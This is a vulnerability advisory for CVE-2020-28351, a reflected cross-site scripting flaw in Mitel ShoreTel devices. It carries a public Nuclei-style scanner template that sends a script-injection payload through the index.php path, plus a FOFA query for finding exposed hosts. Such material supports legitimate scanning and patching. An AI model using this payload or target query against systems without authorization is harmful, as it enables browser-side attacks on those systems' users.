CVE-2020-28351: Mitel ShoreTel 19.46.1802.0 Devices - Cross-Site Scripting

日期: 2025-08-01 | 影响软件: Mitel ShoreTel 19.46.1802.0 Devices | POC: 已公开

漏洞描述

Mitel ShoreTel 19.46.1802.0 devices and their conference component are vulnerable to an unauthenticated attacker conducting reflected cross-site scripting attacks via the PATH_INFO variable to index.php due to insufficient validation for the time_zone object in the HOME_MEETING& page.

PoC代码[已公开]

id: CVE-2020-28351

info:
  name: Mitel ShoreTel 19.46.1802.0 Devices - Cross-Site Scripting
  author: pikpikcu
  severity: medium
  description: |
    Mitel ShoreTel 19.46.1802.0 devices and their conference component are vulnerable to an unauthenticated attacker conducting reflected cross-site scripting attacks via the PATH_INFO variable to index.php due to insufficient validation for the time_zone object in the HOME_MEETING& page.
  impact: |
    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary scripts in the victim's browser, leading to session hijacking, defacement, or theft of sensitive information.
  remediation: |
    Apply the latest security patches or updates provided by Mitel to mitigate the XSS vulnerability.
  reference:
    - https://packetstormsecurity.com/files/159987/ShoreTel-Conferencing-19.46.1802.0-Cross-Site-Scripting.html
    - https://www.mitel.com/articles/what-happened-shoretel-products
    - https://nvd.nist.gov/vuln/detail/CVE-2020-28351
    - http://packetstormsecurity.com/files/159987/ShoreTel-Conferencing-19.46.1802.0-Cross-Site-Scripting.html
    - https://github.com/dievus/cve-2020-28351
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.1
    cve-id: CVE-2020-28351
    cwe-id: CWE-79
    epss-score: 0.09311
    epss-percentile: 0.92463
    cpe: cpe:2.3:h:mitel:shoretel:-:*:*:*:*:*:*:*
  metadata:
    max-request: 1
    vendor: mitel
    product: shoretel
    fofa-query: body="ShoreTel" && icon_hash="268280373"
  tags: cve,cve2020,shoretel,xss,mitel

flow: http(1) && http(2)

http:
  - method: GET
    path:
      - "{{BaseURL}}"
      - "{{BaseURL}}/server-common/cgi-bin/login"

    stop-at-first-match: true
    redirects: true
    matchers:
      - type: word
        part: body
        words:
          - "Mitel Networks Corporation"
          - "ShoreTel"
        case-insensitive: true
        condition: or
        internal: true

  - method: GET
    path:
      - "{{BaseURL}}/index.php/%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E?page=HOME"

    headers:
      Content-Type: application/x-www-form-urlencoded

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - '</script><script>alert(document.domain)</script>'

      - type: word
        part: content_type
        words:
          - 'text/html'

      - type: status
        status:
          - 200
# digest: 4b0a00483046022100f3e9b316d2dd04587e1f58d4aa5b243a70a466fd7b62f8e79ebd8ff926aa9633022100816aeab102d10a92a2c5c541069e23d76e187d7607b7477813521549f40acea7:922c64590222798bb761d5b6d8e72950